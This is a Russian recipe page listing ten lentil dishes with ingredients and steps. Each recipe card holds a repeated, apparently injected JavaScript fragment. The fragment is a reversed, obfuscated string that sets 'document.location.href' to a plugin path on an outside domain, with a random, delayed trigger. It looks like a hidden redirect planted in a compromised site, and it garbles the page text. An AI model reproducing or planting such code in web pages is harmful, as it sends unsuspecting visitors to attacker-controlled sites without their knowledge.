10 очень сытных блюд с чечевицей

О пользе чечевицы можно говорить долго, очень долго. Одно содержание белка (24 г в 100 г крупы) должно вас заставить задуматься о включении этого суперфуда в свой рацион. К тому же чечевица — превосходный источник железа и фолиевой кислоты. Другой вопрос, какие блюда из чечевицы приготовить. А вот какие!

1. Суп из чечевицы

10 очень сытных блюд с чечевицей. Изображение номер 1

thekitchn.com

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

40 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Оливковое масло

1 ст. л.

Морковь

1 шт.

Стебли сельдерея

2 шт.

Лук

1 шт.

Соль

щепотка

Красная чечевица

1 стакан

Бульон

6 стаканов

Лавровый лист

1 шт.

Лимонный сок

2 ст. л.

Оливковое масло

по вкусу

Йогурт (для подачи)

по вкусу

  1. Нарежьте морковь, лук и сельдерей. Обжарьте всё в сотейнике (или в средней кастрюле) в оливковом масле в течение пяти минут. Не забудьте добавить щепотку соли и перемешать.
  2. Высыпьте чечевицу, влейте бульон (или воду), добавьте лавровый лист. Доведите смесь до кипения, а затем убавьте огонь до минимума. Варите 20 минут. Добавьте лимонный сок и перемешайте.
  3. Разлейте суп из чечевицы по тарелкам и перед подачей на стол украсьте оливковым маслом или йогуртом.

2. Суп из чечевицы с чипсами из бекона

10 очень сытных блюд с чечевицей. Изображение номер 2

thekitchn.com

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

40 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Бекон

4 ломтика

Лук

1 шт.

Морковь

1—2 шт.

Стебли сельдерея

2 шт.

Чеснок

2 зубчика

Томатная паста

2 ст. л.

Паприка

1 ст. л.

Тмин, соль

1 ч. л.

Корица

щепотка

Чечевица

1,5 стакана

Куриный или овощной бульон

6 стаканов

Лавровый лист

1 шт.

Греческий йогурт

0,5 стакана

Лимон

1 шт.

Рубленая петрушка

по вкусу

  1. Поджарьте бекон до хрустящего состояния. Выложите его на бумажное полотенце, чтобы стёк лишний жир.
  2. Нарежьте морковь, стебли сельдерея и лук кубиками. Разогрейте оливковое масло в кастрюле и обжаривайте в течение 5 минут лук, стебли сельдерея и морковь.
  3. Добавьте измельчённый чеснок, пасту, перец, тмин, соль и корицу. Держите блюдо на огне примерно полминуты. Как только чеснок начнёт выделять прекрасный аромат, влейте бульон, добавьте чечевицу и доведите суп до кипения. Уменьшите огонь до минимума и варите суп в течение 20—30 минут.
  4. Смешайте йогурт с соком одного лимона. Перед подачей на стол украсьте суп из чечевицы йогуртовой заправкой и чипсами из бекона.

3. Салат из чечевицы с огурцами и оливками

10 очень сытных блюд с чечевицей. Изображение номер 3

thekitchn.com

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

30 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Чечевица

2 стакана

Чеснок

2 зубчика

Лавровый лист

2 шт.

Зернистая горчица

2 ст. л.

Соль

0,5 ч. л.

Винный уксус

2 ст. л.

Оливковое масло

6 ст. л.

Огурец

2 шт.

Оливки (без косточек)

200 г

Листья мяты

10 шт.

Сыр фета

200 г

  1. Смешайте чечевицу, измельчённый чеснок и лавровый лист в большой кастрюле. Залейте 4 стаканами воды. Доведите до кипения на сильном огне, а затем варите на небольшом 15 минут. Слейте воду, чечевицу остудите.
  2. Приготовьте заправку: смешайте оливковое масло, уксус, горчицу и соль.
  3. Нарежьте огурцы и оливки. Смешайте с чечевицей, сыром фета и заправкой.

4. Тёплый французский салат с беконом и травами

10 очень сытных блюд с чечевицей. Изображение номер 4

thekitchn.com

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

50 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Чечевица (зелёная)

200 г

Куриный бульон

200 мл

Соль

щепотка

Перец

щепотка

Бекон

240 г

Небольшая луковица

2 шт.

Розмарин

2 веточки

Шалфей

3 листа

Каперсы

2 ст. л.

Петрушка

0,5 стакана

Оливковое масло

3 ст. л.

Дижонская горчица

1 ст. л.

Бальзамический уксус

0,5 ст. л.

  1. Варите чечевицу в курином бульоне в течение 30—40 минут.
  2. Поджарьте бекон до хрустящей корочки. После слейте половину оставшегося жира.
  3. Нарежьте лук, шалфей, розмарин, измельчите чеснок и  добавьте в эту же сковороду. Готовьте 2—3 минуты до появления аромата чеснока.
  4. Смешайте чечевицу с беконом, рублеными каперсами, петрушкой и луком с шалфеем.
  5. Взбейте оливковое масло, уксус и горчицу. Заправьте этой смесью салат.

5. Ролл из пряной чечевицы

10 очень сытных блюд с чечевицей. Изображение номер 5

thekitchn.com

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

30 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Чечевица красная

0,5 стакана

Булгур

3/4 стакана

Оливковое масло

2 ст. л.

Лук

1 шт.

Молотый тмин

2 ч. л.

Красный перец

3 ч. л.

Зелёный лук

несколько перьев

Петрушка

2 ст. л.

Соль

щепотка

Болгарский перец

6 шт.

Лаваш

6 шт.

Тёртая капуста

2 стакана

Тахини

1/4 стакана

Чеснок

1/4 зубчика

петрушка

2 ч. л.

  1. Сделайте перечную пасту. Смешайте 1 ч. л. соли, щепотку чёрного перца, щепотку красного перца и болгарский перец в комбайне до получения однообразной массы. Тушите на среднем огне на сковороде, периодически помешивая, в течение 2 часов.
  2. Сделайте начинку. Отварите чечевицу до готовности. Положите к ней булгур и подождите 30 минут, пока он впитает воду. На сковороде в оливковом масле обжарьте до мягкости нарезанный на кубики лук. После добавьте тмин, красный перец и готовьте ещё одну минуту. Добавьте в чечевицу вместе с зелёным луком и петрушкой. Перемешайте смесь.
  3. Сделайте соус. Смешайте тахини, чеснок, петрушку и 1 ч. л. красного перца с 200 мл тёплой воды до получения однородной массы.
  4. Выложите на лаваш начинку, 1—2 ст. л. соуса и 1—2 ст. л. перечной пасты. Сверните ролл и разрежьте на 2 части.

6. Чечевица с яйцом

10 очень сытных блюд с чечевицей. Изображение номер 6

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

50—60 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Чечевица (красная)

1 стакан

Горох

1 стакан

Лук

2—3 шт.

Чеснок

2 зубчика

Гарам масала

2 ч. л.

Куриный бульон

4 стакана

Соль, перец

по вкусу

Кинза

100 г

Яйца

4 шт.

  1. Обжарьте до мягкости в течение пяти минут нарезанный лук, измельчённый чеснок на оливковом масле. Добавьте в смесь чечевицу, горох, гарам масалу и хорошо перемешайте.
  2. Добавьте бульон (или воду) и доведите смесь до кипения. Затем варите блюдо на минимальном огне 25—30 минут. Приправьте солью, перцем и кинзой.
  3. Нагрейте духовку до 200 градусов. Четыре формочки для выпекания смажьте маслом. Выложите в них чечевицу. В центре сделайте углубление и разбейте туда яйцо. Выпекайте 18—25 минут до готовности яиц.

7. Ирландский пирог с чечевицей, картофелем и грибами

10 очень сытных блюд с чечевицей. Изображение номер 7

thekitchn.com

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

120 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Сладкий картофель

5 шт.

Чечевица (зелёная)

1 стакана

Овсяные хлопья

3/4 стакана

Лавровый лист

1 шт.

Соль

1 ч. л.

Оливковое масло

1 ст. л.

Грибы

450 г

Морковь, лук, стебель сельдерея

по 1 шт.

Овощной бульон

3/4 стакана

Красное вино

1/4 стакана

Томатная паста, соевый соус

по 1 ст. л.

Паприка

1 ч. л.

Петрушка

1/4 стакана

  1. Разогрейте духовку до 200 градусов. Запеките картофель до мягкости (15—20 минут) и охладите.
  2. В средней кастрюле смешайте чечевицу, овсяные хлопья, лавровый лист с пятью стаканами воды. Варите на медленном огне 15—20 минут, пока чечевица не станет мягкой. Уберите лавровый лист, слейте воду.
  3. Нарежьте грибы кубиками и обжаривайте в оливковом масле, пока они немного не подрумянятся. Добавьте нарезанные лук, морковь, сельдерей и чеснок. Готовьте до того момента, пока лук не станет мягким и прозрачным.
  4. Переключите огонь на средний, добавьте чечевицу, томатную пасту, бульон, соус, перец, петрушку и специи. Варите пять минут.
  5. Извлеките мякоть картофеля, разомните её вилкой, посолите и поперчите. В форме для выпечки равномерно распределите чечевичную смесь, а сверху — картофель. Выпекайте 30 минут, пока картофель не покроется корочкой.

8. Чечевичные фрикадельки по-турецки с травяным соусом

10 очень сытных блюд с чечевицей. Изображение номер 8

thekitchn.com

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

35—40 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Готовая чечевица

1 стакан

Варёное или печёное мясо индейки

230 г

Яйца

2 шт.

Панировочные сухари

2/3 стакана

Нежирный йогурт

1/2 стакана

Сыр фета

1/4 стакана

Маслины

2 ст. л.

Каперсы

1 ст. л.

Чеснок

2 зубчика

Петрушка

3 ст. л.

Сушёный орегано

0,5 ч. л.

Сушёный укроп

2 ч. л.

Соль, перец

по щепотке

натуральный йогурт

1 стакан

лимонная цедра

1 ч. л.

  1. Измельчите в кухонном комбайне чечевицу и индейку. Добавьте в фарш яйца, сухари, нежирный йогурт, фету, нарезанные мелко маслины и каперсы, раздавленный зубчик чеснока, 2 ст. л. петрушки, орегано, 1 ч. л. укропа, соль и перец. Хорошо перемешайте массу и дайте ей настояться 15—20 минут.
  2. Разогрейте духовку до 200 градусов. Сформируйте фрикадельки и распределите их на противне. Выпекайте 20—25 минут — до тех пор, пока они не покроются корочкой.
  3. Сделайте соус. Смешайте натуральный йогурт с раздавленным зубчиком чеснока, 1 ст. л. петрушки, 1 ч. л. укропа, лимонную цедру. Подавайте вместе с фрикадельками.

9. Тушёная чечевица с мангольдом

10 очень сытных блюд с чечевицей. Изображение номер 9

thekitchn.com

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

35—45 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Мангольд

220 г

Оливковое масло

2 ст. л.

Лук

100 г

Морковь

100 г

Чечевица

1 стакан

Чеснок

2 зубчика

Лавровый лист

1 шт.

Тимьян (свежий)

1 ч. л.

Вода

2 стакана

Красный винный уксус

1 ч. л.

Соль, перец

по вкусу

Яйца

3—4 шт.

Петрушка

2 ст. л.

  1. Вырежьте сердцевину из клубней мангольда и нарежьте её кубиками. Также нарежьте лук и морковь. Листья салата отложите в сторону — они ещё пригодятся.
  2. Обжаривайте на масле на среднем огне лук, мангольд, морковь в течение пяти минут.
  3. Добавьте чечевицу, измельчённый чеснок, лавровый лист, тимьян и готовьте одну минуту. Перемешайте всё. Добавьте воду и доведите до кипения. Убавьте огонь и варите всё 20 минут. Извлеките лавровый лист. Добавьте нарезанные листья мангольда и готовьте ещё минут пять. Заправьте уксусом, зеленью, солью.
  4. Приготовьте яичницу и выложите её перед подачей на чечевицу.

10. Салат из запечённой чечевицы с фалафелем

10 очень сытных блюд с чечевицей. Изображение номер 10

thekitchn.com

Для фалафеля

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

45 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Красная чечевица

1 стакан

Листья петрушки

2 стакана

Листья кинзы

2 стакана

Чеснок

5 зубчиков

Лук красный

1 шт.

Перец серрано

1—2 шт.

Семена кунжута

1,5 ст. л.

Оливковое масло

1,5 ст. л.

Соль

1 ч. л.

Молотый тмин

1 ч. л.

Молотый кориандр

1 ч. л.

Сода

0, 5 ч. л.

Мука

1—3 ст. л.

Для соуса из тахини и салата

10 очень сытных блюд с чечевицей

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

20 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Кунжутная паста для тахини

1/3 стакана

Лимон (сок)

1 шт.

Вода

3 ст. л.

Чеснок

1 зубчик

Петрушка

1/4 стакана

Паприка

1/2 ч. л.

Соль, перец

по вкусу

Тосканская капуста

3 стакана

Морковь

3 шт.

Красный лук

1/4 стакана

Оливковое масло

3 ст. л.

Лимонный сок

1 ст. л.

  1. Замочите чечевицу в пресной воде на ночь. Перед готовкой слейте воду.
  2. В кухонном комбайне пюрируйте чечевицу. Добавьте петрушку, кинзу, чеснок, лук, перец и серрано, затем перемешайте ещё раз до однородной массы. Добавьте оливковое масло, специи и снова перемешайте. Добавьте соду и муку. Сформируйте фрикадельки и выложите на противень, выстланный бумагой для выпечки. Сбрызните шарики оливковым маслом и готовьте в духовке при 180—200 градусах до золотистого цвета (примерно 18—20 минут).
  3. Приготовьте соус: взбейте тахини, лимонный сок и воду. Смешайте с измельчённым чесноком, нарезанной петрушкой, паприкой и приправьте по вкусу солью и перцем.
  4. Нарежьте капусту, лук, морковь, смешайте с 1 ст. л. лимонного сока и оливковым маслом. Подавайте салат с фрикадельками и соусом из тахини.

Если вам понравилcя этот материал, можете подписаться на нашу страничку в «Фэйсбук» или «Вконтакте». С нами вы будете знать, как следить за своим здоровьем, и станете таким красивым, что все вокруг просто обзавидуются.

Наш сочный Instagram — вот по этой ссылке.

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector